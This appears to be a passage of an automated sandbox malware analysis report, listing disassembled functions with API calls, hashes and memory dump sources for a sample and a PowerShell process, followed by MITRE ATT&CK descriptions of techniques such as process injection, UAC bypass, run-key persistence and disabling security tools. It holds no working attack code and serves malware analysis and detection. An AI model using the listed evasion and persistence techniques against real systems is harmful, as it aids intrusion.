header crc mismatch, xrefs: 000000014001348B
, xrefs: 00000001400130CB
, xrefs: 00000001400130EB

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID:
String ID: $ $header crc mismatch
API String ID: 0-4092041874
Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780

Function 0000000140007A50 Relevance: 6.2, APIs: 4, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0000000140007B33
wcsncpy.MSVCRT ref: 0000000140007B9F
wcsncpy.MSVCRT ref: 0000000140007BF9
HeapFree.KERNEL32 ref: 0000000140007C15

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Heapwcsncpy$AllocFree
String ID:
API String ID: 1479455602-0
Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300

Function 00000001400136B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 106COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 000000014001375C

Strings

invalid stored block lengths, xrefs: 00000001400136F0
, xrefs: 00000001400136DB
, xrefs: 00000001400136BA

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: memmove
String ID: $ $invalid stored block lengths
API String ID: 2162964266-1718185709
Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40

Function 000000014000C4F0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 000000014000C5A6
RtlLookupFunctionEntry.KERNEL32 ref: 000000014000C5E1
RtlVirtualUnwind.KERNEL32 ref: 000000014000C64C
RtlLookupFunctionEntry.KERNEL32 ref: 000000014000C672

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: EntryFunctionLookup$UnwindVirtual
String ID:
API String ID: 3286588846-0
Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700

Function 00000001400085F0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

CharLowerW.USER32 ref: 000000014000861A
CharLowerW.USER32 ref: 000000014000864F
CharLowerW.USER32 ref: 000000014000867D
CharLowerW.USER32 ref: 0000000140008688

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710

Function 00000001400171F0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 000000014001724E
malloc.MSVCRT ref: 0000000140017260
WideCharToMultiByte.KERNEL32 ref: 000000014001728B
malloc.MSVCRT ref: 00000001400172A2

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700

Function 000000014000DCA4 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderLocation.SHELL32 ref: 000000014000DCCD
SHGetPathFromIDListW.SHELL32 ref: 000000014000DCDF
wcslen.MSVCRT ref: 000000014000DCEC
CoTaskMemFree.OLE32 ref: 000000014000DD0F

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300

Function 000000014001147C Relevance: 5.1, APIs: 4, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001149E
HeapAlloc.KERNEL32 ref: 0000000140011573
HeapAlloc.KERNEL32 ref: 0000000140011597
LeaveCriticalSection.KERNEL32 ref: 0000000140011600

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750

Function 000000014000D02C Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 000000014000D0B1
HeapAlloc.KERNEL32 ref: 000000014000D0C7
wcscpy.MSVCRT ref: 000000014000D0D7
memset.MSVCRT ref: 000000014000D111

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AllocHeapmemsetwcscpywcslen
String ID:
API String ID: 1807340688-0
Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351

Function 000000014000CCD8 Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CE61
Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CE74
Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CE8F
Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CEB1

HeapAlloc.KERNEL32 ref: 000000014000CD11
HeapAlloc.KERNEL32 ref: 000000014000CD42
HeapAlloc.KERNEL32 ref: 000000014000CDB2
HeapFree.KERNEL32 ref: 000000014000CDD8

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID:
API String ID: 3901518246-0
Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740

Function 00000001400112A8 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400112C4
HeapReAlloc.KERNEL32 ref: 0000000140011308
LeaveCriticalSection.KERNEL32 ref: 0000000140011355

Part of subcall function 0000000140011CB0: HeapAlloc.KERNEL32 ref: 0000000140011CC8

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350

Function 0000000140017120 Relevance: 5.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 0000000140017161
malloc.MSVCRT ref: 000000014001717B
MultiByteToWideChar.KERNEL32 ref: 0000000140017196
malloc.MSVCRT ref: 00000001400171B3

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704

Function 0000000140011668 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001167F
HeapFree.KERNEL32 ref: 000000014001169A
HeapFree.KERNEL32 ref: 00000001400116BC
LeaveCriticalSection.KERNEL32 ref: 00000001400116E2

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300

Function 000000014000CE30 Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000D140: memset.MSVCRT ref: 000000014000D1C3

Part of subcall function 0000000140011968: EnterCriticalSection.KERNEL32 ref: 0000000140011985
Part of subcall function 0000000140011968: HeapFree.KERNEL32 ref: 00000001400119E7
Part of subcall function 0000000140011968: LeaveCriticalSection.KERNEL32 ref: 00000001400119F4

HeapFree.KERNEL32 ref: 000000014000CE61
HeapFree.KERNEL32 ref: 000000014000CE74
HeapFree.KERNEL32 ref: 000000014000CE8F
HeapFree.KERNEL32 ref: 000000014000CEB1

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

Analysis Process: powershell.exePID: 2188, Parent PID: 8044COMMON

Executed Functions

Function 00007FFD9B8B37B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2616325496.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: ad11833d54da4bcaa44fa23ccdbb85ddc80141cc9248b7fa53866c9f89e6517d
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 9C01A77020CB0D8FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1D632E882CB45

Analysis Process: c92938c010.exePID: 7172, Parent PID: 7804COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	2
Total number of Limit Nodes:	0

Executed Functions

Function 06AEF319 Relevance: 1.3, APIs: 1, Instructions: 19
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 06AEF346

Memory Dump Source

Source File: 00000010.00000002.2973343876.0000000006AEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: true

Associated: 00000010.00000002.2970553300.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2970633275.0000000006AE2000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2971117521.0000000006AE6000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2973343876.0000000006C65000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2973343876.0000000006D70000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2973343876.0000000006D7E000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2973343876.0000000006D80000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6ae0000_c92938c010.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 05efab08369f4b93bd9af02b8fee87fe4fa2a7baef4b4905b05ff40743c21d8a
Instruction ID: a5d919cb32bea6a182f20594b8eb593fe8b4c5b7edfacb4e656829f3222f8b9f
Opcode Fuzzy Hash: 05efab08369f4b93bd9af02b8fee87fe4fa2a7baef4b4905b05ff40743c21d8a
Instruction Fuzzy Hash: CEE01AB5508248CFDB406F38D9486AE7BB0FF84320F02452DE9D486680D7364CA0DF16

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
